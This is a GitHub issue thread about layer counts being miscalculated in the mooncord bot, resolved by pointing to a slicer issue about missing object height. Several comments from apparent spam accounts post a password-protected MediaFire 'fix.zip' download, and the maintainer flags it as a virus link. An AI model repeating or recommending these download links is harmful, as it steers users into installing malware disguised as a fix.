### ISSUE TITLE
Layer Calculation bugged

### ISSUE THREAD

**Issue by eliteSchwein** [eliteSchwein/mooncord#332]
![Screenshot_20240826_115317](https://github.com/user-attachments/assets/f161b79f-e8dd-4dc9-85af-801e3c1fa1e3)
not sure if its my slicer profile or mooncord but the layer calculation is broken

**Comment by eliteSchwein** [comment]
okay, its actuelly fine. the print is literally just 3 layers lol

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eliteSchwein** [comment]
PSA: the comment got deleted because it contains a virus url. DONT. CLICK. ON. IT.

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eliteSchwein** [comment]
its actuelly a bot bug or slicer bug. need to check

**Comment by eliteSchwein** [comment]
https://github.com/SoftFever/OrcaSlicer/issues/1703

here is the solution. without object height mooncord cant calculate the layers
